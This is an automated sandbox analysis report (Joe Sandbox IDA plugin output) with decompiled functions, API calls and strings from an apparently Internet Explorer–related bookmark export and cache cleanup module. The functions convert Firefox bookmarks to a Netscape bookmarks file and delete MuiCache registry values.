            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A4F4C(struct _EXCEPTION_POINTERS* _a4) {
            
            				SetUnhandledExceptionFilter(0);
            				UnhandledExceptionFilter(_a4);
            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
            			}


            APIs
            • SetUnhandledExceptionFilter.KERNEL32 ref: 003A4F53
            • UnhandledExceptionFilter.KERNEL32(003A5087), ref: 003A4F5C
            • GetCurrentProcess.KERNEL32(C0000409,?,003A5087,p`:), ref: 003A4F67
            • TerminateProcess.KERNEL32(00000000,?,003A5087,p`:), ref: 003A4F6E
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
            • String ID:
            • API String ID: 3231755760-0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A47E2() {
            				void* _t1;
            				int _t2;
            
            				if( *0x3a63a4 == 0) {
            					0x3a63a8->dwOSVersionInfoSize = 0x9c;
            					_t2 = GetVersionExA(0x3a63a8);
            					 *0x3a63a4 = 1;
            					return _t2;
            				}
            				return _t1;
            			}


            APIs
            • GetVersionExA.KERNEL32(003A63A8,003A31E5), ref: 003A47FA
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: Version
            • String ID:
            • API String ID: 1889659487-0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,750A4D40,00000000), ref: 003A38CE
            • PathFindFileNameW.SHLWAPI(?), ref: 003A38E3
            • StrCmpICW.SHLWAPI(00000000,IEXPLORE.EXE), ref: 003A38F7
            • StrCmpICW.SHLWAPI(00000000,MSFEEDSSYNC.EXE), ref: 003A3909
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: FileName$FindModulePath
            • String ID: EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE
            • API String ID: 1618668439-1412893414
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 73%
            			E003A2D9C(char* __ecx, void* __edx, long long __fp0) {
            				signed int _v8;
            				char _v32;
            				char _v2060;
            				char _v4108;
            				long long _v4112;
            				signed int _v4116;
            				WCHAR* _v4120;
            				char _v4124;
            				intOrPtr _v4128;
            				char _v4132;
            				intOrPtr _v4140;
            				intOrPtr _v4144;
            				intOrPtr _v4148;
            				char _v4172;
            				WCHAR* _v4180;
            				WCHAR* _v4184;
            				WCHAR* _v4188;
            				char _v4212;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t57;
            				void* _t63;
            				void* _t65;
            				void* _t72;
            				void* _t82;
            				char* _t89;
            				void* _t90;
            				char* _t98;
            				void* _t104;
            				void* _t105;
            				WCHAR* _t107;
            				void* _t108;
            				WCHAR* _t109;
            				signed int _t110;
            				signed int _t111;
            				long long* _t112;
            				void* _t113;
            				long long* _t114;
            				long long _t130;
            				long long _t131;
            
            				_t130 = __fp0;
            				_t102 = __edx;
            				_t91 = __ecx;
            				E003A50C0(0x1074);
            				_v8 =  *0x3a6004 ^ _t111;
            				 *0x3a638c =  *0x3a638c + 1;
            				_t107 = 0;
            				_t89 = __ecx;
            				_v4124 = 0;
            				_v4120 = 0;
            				if(E003A295F() == 0) {
            					L16:
            					_v4132 = _t107;
            					_v4128 = _t107;
            					if(E003A295F() == 0) {
            						L22:
            						 *0x3a638c =  *0x3a638c - 1;
            						E003A27B8( &_v4132, _t128);
            						_t57 = E003A27B8( &_v4124, _t128);
            						_pop(_t104);
            						_pop(_t108);
            						_pop(_t90);
            						return E003A4AAD(_t57, _t90, _v8 ^ _t111, _t102, _t104, _t108);
            					}
            					E003A2225( &_v4108, 0x400, L"select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favicons as i on p.favicon_id=i.id where b.fk=p.id and b.parent=%d", _t89);
            					_t113 = _t112 + 0x10;
            					_t63 = E003A2B5D(_t91,  &_v4108,  &_v4132);
            					_t127 = _t63;
            					if(_t63 < 0) {
            						goto L22;
            					}
            					_v4148 = _t107;
            					_v4144 = _t107;
            					_v4140 = _t107;
            					while(1) {
            						_t65 = E003A2809( &_v4132, _t102, _t127,  &_v4172);
            						_t128 = _t65;
            						if(_t65 < 0) {
            							break;
            						}
            						_push(_v4148);
            						asm("fild qword [ebp-0x1038]");
            						_push(_v4140);
            						_v4112 = _t130;
            						_t131 = _v4112;
            						_t114 = _t113 - 0x10;
            						_v32 = _t131;
            						asm("fild qword [ebp-0x1040]");
            						_v4112 = _t131;
            						_t130 = _v4112;
            						 *_t114 = _t130;
            						E003A2CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" LAST_MODIFIED=\"%.0f\" ICON_URI=\"%s\">%s</A>", _v4144);
            						_t113 = _t114 + 0x20;
            					}
            					E003A2BEB( &_v4172);
            					goto L22;
            				}
            				E003A2225( &_v2060, 0x400, L"select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d", __ecx);
            				_t112 = _t112 + 0x10;
            				_t72 = E003A2B5D(_t91,  &_v2060,  &_v4124);
            				_t116 = _t72;
            				if(_t72 < 0) {
            					goto L16;
            				}
            				_v4188 = 0;
            				_t98 =  &_v4124;
            				_v4184 = 0;
            				_v4180 = 0;
            				if(E003A28D3(_t98, __edx, _t116,  &_v4212) < 0) {
            					L15:
            					_t91 =  &_v4212;
            					E003A2BEB( &_v4212);
            					goto L16;
            				} else {
            					_t105 = lstrcmpW;
            					do {
            						_t109 = _v4188;
            						if(_t89 != 1 || lstrcmpW(_t109, L"Tags") != 0 && lstrcmpW(_t109, 0x3a1744) != 0) {
            							if(lstrcmpW(_t109, L"Smart Bookmarks") != 0) {
            								_v4116 = _v4116 & 0x00000000;
            								_t82 = E003A2A22(_t98, _t105, _v4212,  &_v4116);
            								asm("fild qword [ebp-0x1068]");
            								_push(_t109);
            								if(_t82 != 0) {
            									_push(_v4116);
            									_v4112 = _t130;
            									_t130 = _v4112;
            									_t110 = _v4116;
            									_push(_t98);
            									_push(_t98);
            									_v32 = _t130;
            									E003A2CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" FEEDURL=\"%s\">%s</A>", _t110);
            									_t112 = _t112 + 0x18;
            								} else {
            									_v4112 = _t130;
            									_t130 = _v4112;
            									 *_t112 = _t130;
            									E003A2CD4(L"<DT><H3 FOLDED ADD_DATE=\"%.0f\">%s</H3>", _t98);
            									E003A2CD4(L"<DL><p>", _t98);
            									_t112 = _t112 + 0x14;
            									E003A2D9C(_v4212, _t102, _t130);
            									_push(L"</DL><p>");
            									E003A2CD4();
            									_t110 = _v4116;
            								}
            								_t123 = _t110;
            								if(_t110 != 0) {
            									__imp__??3@YAXPAX@Z(_t110);
            								}
            							}
            						}
            						_t98 =  &_v4124;
            					} while (E003A28D3(_t98, _t102, _t123,  &_v4212) >= 0);
            					_t107 = 0;
            					goto L15;
            				}
            			}


            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • lstrcmpW.KERNEL32(?,Tags,?,?), ref: 003A2E53
            • lstrcmpW.KERNEL32(?,003A1744), ref: 003A2E63
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(003A1748,00000002,?,00000000), ref: 003A2D1B
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(?,?,?,00000000), ref: 003A2D6D
              • Part of subcall function 003A2CD4: WriteFile.KERNEL32(003A174C,00000004,?,00000000), ref: 003A2D84
            • lstrcmpW.KERNEL32(?,Smart Bookmarks,?,?), ref: 003A2E73
            • ??3@YAXPAX@Z.MSVCRT ref: 003A2F17
            Strings
            • <DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>, xrefs: 003A2FE7
            • <DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>, xrefs: 003A2F05
            • Smart Bookmarks, xrefs: 003A2E6D
            • <DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>, xrefs: 003A2EB2
            • Tags, xrefs: 003A2E4D
            • select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d, xrefs: 003A2DDC
            • select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic, xrefs: 003A2F5F
            • <DL><p>, xrefs: 003A2EBC
            • </DL><p>, xrefs: 003A2ED4
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: FileWritelstrcmp$??3@_vsnwprintf
            • String ID: </DL><p>$<DL><p>$<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>$<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>$<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>$Smart Bookmarks$Tags$select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d$select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic
            • API String ID: 1448721381-3632509114
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 37%
            			E003A3047(WCHAR* __ecx, void* __edx, void* __fp0) {
            				signed int _v8;
            				char _v532;
            				intOrPtr _v540;
            				char _v544;
            				intOrPtr _v548;
            				char _v572;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t14;
            				void* _t16;
            				void* _t34;
            				void* _t42;
            				struct HINSTANCE__* _t43;
            				char* _t51;
            				char* _t53;
            				void* _t54;
            				void* _t56;
            				void* _t57;
            				void* _t60;
            				signed int _t62;
            				signed int _t64;
            
            				_t68 = __fp0;
            				_t54 = __edx;
            				_t64 = (_t62 & 0xfffffff8) - 0x23c;
            				_v8 =  *0x3a6004 ^ _t64;
            				_t56 = 0;
            				if(E003A295F() == 0) {
            					L9:
            					_t14 = _t56;
            					L10:
            					_pop(_t57);
            					_pop(_t60);
            					_pop(_t42);
            					return E003A4AAD(_t14, _t42, _v8 ^ _t64, _t54, _t57, _t60);
            				}
            				_t16 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
            				 *0x3a600c = _t16;
            				if(_t16 != 0xffffffff) {
            					_push(L"<!DOCTYPE NETSCAPE-Bookmark-file-");
            					E003A2C23(0);
            					 *_t64 = L"1>";
            					E003A2CD4();
            					 *_t64 = L"<!-- This is an automatically generated file.\r\nIt will be read and overwritten.\r\nDo Not Edit! -->";
            					E003A2CD4();
            					 *_t64 = L"<TITLE>Bookmarks</TITLE>\r\n<H1>Bookmarks</H1>";
            					E003A2CD4();
            					 *_t64 = L"<DL><p>";
            					E003A2CD4();
            					_t48 = 2;
            					E003A2D9C(_t48, _t54, __fp0);
            					_t43 = LoadLibraryExW(L"ieframe.dll", 0, 0x60);
            					if(_t43 != 0) {
            						_t64 = _t64 - 0xc;
            						_t48 = _t43;
            						_t34 = E003A32EB(_t43, _t54,  &_v532);
            						FreeLibrary(_t43);
            						if(_t34 >= 0) {
            							E003A2CD4(L"<DT><H3 FOLDED>%s</H3>",  &_v544);
            							_push(L"<DL><p>");
            							E003A2CD4();
            							_t64 = _t64 + 0xc;
            							_t53 = 3;
            							E003A2D9C(_t53, _t54, __fp0);
            							_push(L"</DL><p>");
            							E003A2CD4();
            							_pop(_t48);
            						}
            					}
            					_v548 = _t56;
            					_v544 = _t56;
            					_v540 = _t56;
            					if(E003A2986(_t43, _t48, _t54, _t48,  &_v572) >= 0) {
            						E003A2CD4(L"<DT><H3 FOLDED>%s</H3>", _v548);
            						_push(L"<DL><p>");
            						E003A2CD4();
            						_t64 = _t64 + 0xc;
            						_t51 = 5;
            						E003A2D9C(_t51, _t54, _t68);
            						_push(L"</DL><p>");
            						E003A2CD4();
            					}
            					_push(L"</DL><p>");
            					E003A2CD4();
            					CloseHandle( *0x3a600c);
            					_t56 = 1;
            					E003A2BEB( &_v572);
            					goto L9;
            				}
            				_t14 = 0;
            				goto L10;
            			}


            APIs
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003A3085
            • LoadLibraryExW.KERNEL32(ieframe.dll,00000000,00000060,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 003A30E7
            • FreeLibrary.KERNEL32(00000000,?), ref: 003A3105
            • CloseHandle.KERNEL32 ref: 003A3198
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: Library$CloseCreateFileFreeHandleLoad
            • String ID: <!-- This is an automatically generated file.It will be read and overwritten.Do Not Edit! -->$<!DOCTYPE NETSCAPE-Bookmark-file-$</DL><p>$</DL><p>$<DL><p>$<DT><H3 FOLDED>%s</H3>$<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>$ieframe.dll
            • API String ID: 3702922737-715636854
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • SHGetFolderPathAndSubDirW.SHELL32(00000000,00000006,00000000,00000000,Links,?), ref: 003A3325
            • #672.IERTUTIL(?,00000000), ref: 003A3333
            • #675.IERTUTIL(?,00000000), ref: 003A3365
            • SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 003A3354
              • Part of subcall function 003A3772: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,003A3102), ref: 003A37B8
              • Part of subcall function 003A3772: RegDeleteValueW.ADVAPI32(?,?), ref: 003A37DB
              • Part of subcall function 003A3772: RegDeleteValueW.ADVAPI32(?,?), ref: 003A3838
              • Part of subcall function 003A3772: RegCloseKey.ADVAPI32(?), ref: 003A3875
            • #672.IERTUTIL(?,00000000), ref: 003A3377
            • #675.IERTUTIL(?,00000000), ref: 003A3398
            • SHGetFolderPathAndSubDirW.SHELL32(00000000,00008006,00000000,00000000,Links,?), ref: 003A33B2
            • SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 003A33CB
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: #672#675DeleteFolderLocalizedNamePathValue$CloseOpen
            • String ID: %windir%\System32\ieframe.dll$Links
            • API String ID: 4100310970-3729751556
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 75%
            			E003A3772(short* __edx, void* __edi) {
            				signed int _v8;
            				short _v528;
            				void* _v532;
            				void* __ebx;
            				void* __esi;
            				long _t31;
            				long _t36;
            				void* _t46;
            				int _t47;
            				signed int _t48;
            				void* _t49;
            
            				_t45 = __edi;
            				_t44 = __edx;
            				_v8 =  *0x3a6004 ^ _t48;
            				_push(L"[IECleanup LIB] CleanupMuiCache()");
            				_push(0);
            				E003A3A1B(0, __edx, __edi, _t46);
            				_t47 = 0;
            				do {
            					_v532 = 0;
            					if(RegOpenKeyExW(0x80000001,  *(_t47 + 0x3a6010), 0, 0x20006,  &_v532) != 0) {
            						goto L11;
            					}
            					if(( *(_t47 + 0x3a6018) & 0x00000001) != 0) {
            						_t36 = RegDeleteValueW(_v532,  *(_t47 + 0x3a6014));
            						if(_t36 != 0) {
            							_push(_t36);
            							E003A3A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  *(_t47 + 0x3a6014));
            							_t49 = _t49 + 0x10;
            						} else {
            							E003A3A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  *(_t47 + 0x3a6014));
            							_t49 = _t49 + 0xc;
            						}
            					}
            					if(( *(_t47 + 0x3a6018) & 0x00000002) != 0) {
            						_t44 =  &_v528;
            						E003A479B( *(_t47 + 0x3a6014),  &_v528,  *(_t47 + 0x3a6014));
            						_t31 = RegDeleteValueW(_v532,  &_v528);
            						if(_t31 != 0) {
            							_push(_t31);
            							E003A3A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  &_v528);
            							_t49 = _t49 + 0x10;
            						} else {
            							E003A3A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  &_v528);
            							_t49 = _t49 + 0xc;
            						}
            					}
            					_t27 = RegCloseKey(_v532);
            					L11:
            					_t47 = _t47 + 0xc;
            				} while (_t47 < 0x24);
            				return E003A4AAD(_t27, 0, _v8 ^ _t48, _t44, _t45, _t47);
            			}

            APIs
              • Part of subcall function 003A3A1B: DecodePointer.KERNEL32 ref: 003A3A83
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,003A3102), ref: 003A37B8
            • RegDeleteValueW.ADVAPI32(?,?), ref: 003A37DB
            • RegDeleteValueW.ADVAPI32(?,?), ref: 003A3838
            • RegCloseKey.ADVAPI32(?), ref: 003A3875
            Strings
            • [IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d, xrefs: 003A3802, 003A3861
            • [IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s', xrefs: 003A37EB, 003A3849
            • [IECleanup LIB] CleanupMuiCache(), xrefs: 003A378B
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: DeleteValue$CloseDecodeOpenPointer
            • String ID: [IECleanup LIB] CleanupMuiCache()$[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s'$[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d
            • API String ID: 2742595093-2876198904
            • Opcode ID: 1751cf5c04dee118284a56622e028da831c3fd942e64ab484cb495cff6904eeb
            • Instruction ID: 7e4ccb9ea925fd3ba3c1f07bb8026afaf1714939ee4e560be7ce7cc87cb74cbb
            • Opcode Fuzzy Hash: 1751cf5c04dee118284a56622e028da831c3fd942e64ab484cb495cff6904eeb
            • Instruction Fuzzy Hash: 2921F7B294431CABD723DB608C8AFEA776DEF03300F0408A9F95E61092D7715F949B50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 98%
            			E003A4083(wchar_t* __ecx, void* __eflags, wchar_t* _a4) {
            				short _v8;
            				void* _v12;
            				void* _v16;
            				signed int _v20;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				short _t81;
            				intOrPtr _t89;
            				intOrPtr* _t90;
            				long _t91;
            				void* _t93;
            				intOrPtr* _t99;
            				long _t102;
            				intOrPtr _t105;
            				short _t107;
            				void* _t108;
            				signed int _t109;
            				void* _t111;
            				void* _t112;
            				void* _t118;
            				void* _t119;
            				intOrPtr _t122;
            				long* _t123;
            				void* _t126;
            				intOrPtr _t129;
            				wchar_t* _t132;
            				intOrPtr _t134;
            				wchar_t* _t137;
            				long _t141;
            				wchar_t* _t142;
            				long _t145;
            				wchar_t* _t150;
            				signed int _t151;
            				signed int _t152;
            				signed int _t154;
            				long* _t167;
            				void* _t169;
            				wchar_t* _t170;
            				intOrPtr _t172;
            				wchar_t* _t178;
            				wchar_t* _t180;
            				void* _t181;
            				short* _t182;
            				intOrPtr _t183;
            				long* _t184;
            				intOrPtr* _t185;
            				void* _t186;
            				short* _t187;
            
            				_t178 = __ecx;
            				_t81 = E003A3AA8(__ecx, 0x104, 0x3a1744);
            				_v8 = _t81;
            				if(_t81 < 0) {
            					return _t81;
            				}
            				_t132 = _a4;
            				_t137 = _t132;
            				_v16 = 0x104;
            				_v12 = 0x104;
            				if(E003A3CA0(_t137,  &_v20) == 0) {
            					_t180 = _t178;
            					_a4 = _t180;
            					if(E003A46C3(_t132, L"\\\\?\\", 4) == 0) {
            						iswalpha( *_t132 & 0x0000ffff);
            					} else {
            						_t123 =  &(_t132[2]);
            						_v20 = _t123;
            						if(iswalpha( *_t123 & 0x0000ffff) != 0) {
            							_t126 = 0x3a;
            							if(_t132[2] == _t126) {
            								_t132 = _v20;
            							}
            						}
            					}
            				} else {
            					_push(_t137);
            					_t129 = E003A3AE7(_t178, 0x104, L"\\\\",  &_a4,  &_v12);
            					_t132 = _v20;
            					_t180 = _a4;
            					_v8 = _t129;
            					_v16 = _v12;
            				}
            				if(_v8 < 0) {
            					L64:
            					E003A3AA8(_t178, 0x104, 0x3a1744);
            					_t89 = _v8;
            					if(_t89 == 0x8007007a) {
            						_t89 = _t89 + 0x54;
            					}
            					L66:
            					return _t89;
            				}
            				_t90 = 0;
            				_v24 = 0;
            				while(1) {
            					_t141 = 0x5c;
            					if( *_t132 == _t90) {
            						break;
            					}
            					_t170 = wcschr(_t132, _t141);
            					_v28 = _t170;
            					if(_t170 == 0) {
            						_t150 = _t132;
            						_v20 =  &(_t150[0]);
            						do {
            							_t102 =  *_t150;
            							_t150 =  &(_t150[0]);
            						} while (_t102 != _v24);
            						_t151 = _t150 - _v20;
            						L16:
            						_t152 = _t151 >> 1;
            						_v20 = _t152;
            						if(_t152 > 0x100 || _t152 >= 0x8000) {
            							_v8 = 0x800700ce;
            							goto L64;
            						} else {
            							if(_t152 != 1) {
            								if(_t152 != 2) {
            									if(_t152 == 0) {
            										_t111 = 0x5c;
            										if( *_t132 == _t111) {
            											_t152 = _t152 + 1;
            											_v20 = _t152;
            										}
            									}
            									L49:
            									_push(_t152);
            									_t105 = E003A3B87(_t180, _v16, _t132, _t152,  &_a4,  &_v12);
            									_t154 = _v20;
            									_t183 = _t105;
            									_v8 = _t183;
            									if(_t183 != 0x8007007a || _t154 != 1) {
            										L59:
            										_v16 = _v12;
            										goto L60;
            									} else {
            										_t108 = 0x5c;
            										if( *_t132 != _t108) {
            											goto L59;
            										}
            										_t109 = _t132[0] & 0x0000ffff;
            										if(_t109 == 0) {
            											L62:
            											_t180 = _a4;
            											_t134 = 0;
            											_v8 = 0;
            											L69:
            											if(_t134 < 0) {
            												goto L64;
            											}
            											if(_t180 <= _t178) {
            												L77:
            												_t142 = _t178;
            												_t167 =  &(_t142[0]);
            												do {
            													_t91 =  *_t142;
            													_t142 =  &(_t142[0]);
            												} while (_t91 != 0);
            												_t181 = _t178 + (_t142 - _t167 >> 1) * 2;
            												if(_t181 >=  &(_t178[3]) && E003A46C3(_t181 - 0xe, L"::$DATA", 7) != 0) {
            													 *((short*)(_t181 - 0xe)) = 0;
            												}
            												_t145 = 0x5c;
            												if( *_t178 == 0) {
            													 *_t178 = _t145;
            													_t178[0] = 0;
            												}
            												_t93 = 0x3a;
            												if(_t178[0] == _t93 && _t178[1] == 0) {
            													_t178[1] = _t145;
            													_t178[1] = 0;
            												}
            												_t89 = 0;
            												goto L66;
            											}
            											_t182 = _t180 - 2;
            											_t169 = 0x2e;
            											if( *_t182 != _t169) {
            												goto L77;
            											}
            											while(_t182 != _t178) {
            												_t99 = _t182 - 2;
            												if( *_t99 == 0x2a) {
            													goto L77;
            												}
            												 *_t182 = 0;
            												_t182 = _t99;
            												if( *_t99 == _t169) {
            													continue;
            												}
            												goto L77;
            											}
            											 *_t182 = 0;
            											goto L77;
            										}
            										_t186 = 0x2e;
            										if(_t109 != _t186 || _t132[1] != 0) {
            											_t172 = _v12;
            											_v16 = _t172;
            											if(_t172 != 1 || _t109 != _t186 || _t132[1] != _t186) {
            												L60:
            												_t107 = _v8;
            												_t180 = _a4;
            												goto L61;
            											} else {
            												_t187 = _a4;
            												_t107 = 0;
            												_v8 = 0;
            												_v16 = 0;
            												_v12 = 0;
            												 *_t187 = 0;
            												_t180 = _t187 + 2;
            												_a4 = _t180;
            												L61:
            												_t132 = _t132 + _t154 * 2;
            												L23:
            												if(_t107 < 0) {
            													goto L64;
            												}
            												_t90 = 0;
            												continue;
            											}
            										} else {
            											goto L62;
            										}
            									}
            								}
            								_t112 = 0x2e;
            								if( *_t132 != _t112 || _t132[0] != _t112) {
            									goto L49;
            								} else {
            									if(_t180 <= _t178) {
            										L44:
            										_t107 = _v8;
            										if(_t170 == 0) {
            											L42:
            											_t132 =  &(_t132[1]);
            											goto L23;
            										}
            										_t41 = _t170 + 2; // 0x2
            										_t132 = _t41;
            										goto L23;
            									}
            									if(E003A3D00(_t178) != 0) {
            										_t170 = _v28;
            										goto L44;
            									}
            									_t184 =  &(_t180[0]);
            									if(_t178 >= _t184) {
            										L37:
            										_t185 = 0;
            										L38:
            										_a4 = _t185;
            										_t156 = 0x104;
            										if(_t185 == 0) {
            											_t180 = _t178;
            											_a4 = _t180;
            										} else {
            											_t156 = 0x104 - (_t185 - _t178 >> 1);
            										}
            										_v12 = _t156;
            										_v16 = _t156;
            										_t107 = E003A3AA8(_t180, _t156, 0x3a1744);
            										_v8 = _t107;
            										goto L42;
            									}
            									_t118 = 0x5c;
            									while(1) {
            										_t185 = _t184 - 2;
            										if( *_t185 == _t118) {
            											goto L38;
            										}
            										if(_t178 < _t185) {
            											continue;
            										}
            										goto L37;
            									}
            									goto L38;
            								}
            							}
            							_t119 = 0x2e;
            							if( *_t132 != _t119) {
            								goto L49;
            							}
            							if(_t170 == 0) {
            								_t132 =  &(_t132[0]);
            								if(_t180 <= _t178 || E003A3D00(_t178) != 0) {
            									L22:
            									_t107 = _v8;
            								} else {
            									_t180 = _t180 - 2;
            									_t122 = _v16 + 1;
            									_a4 = _t180;
            									_v16 = _t122;
            									_v12 = _t122;
            									_t107 = E003A3AA8(_t180, _t122, 0x3a1744);
            									_v8 = _t107;
            								}
            								goto L23;
            							}
            							_t26 = _t170 + 2; // 0x2
            							_t132 = _t26;
            							goto L22;
            						}
            					}
            					_t151 = _t170 - _t132;
            					goto L16;
            				}
            				_t134 = _v8;
            				goto L69;
            			}

            APIs
            • iswalpha.MSVCRT ref: 003A410E
            • wcschr.MSVCRT ref: 003A4150
              • Part of subcall function 003A3D00: iswalpha.MSVCRT ref: 003A3D26
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: iswalpha$wcschr
            • String ID: ::$DATA$\\?\
            • API String ID: 2247047535-2521888196
            • Opcode ID: f3c3800d142e3704466d4945a69c869360958c0a57ffc3aaf737a787f6a21bd8
            • Instruction ID: 0e70dbf5066aa6c4423b44647fcc8a3f7f83b272fa73cfb42de1d258fc45d16b
            • Opcode Fuzzy Hash: f3c3800d142e3704466d4945a69c869360958c0a57ffc3aaf737a787f6a21bd8
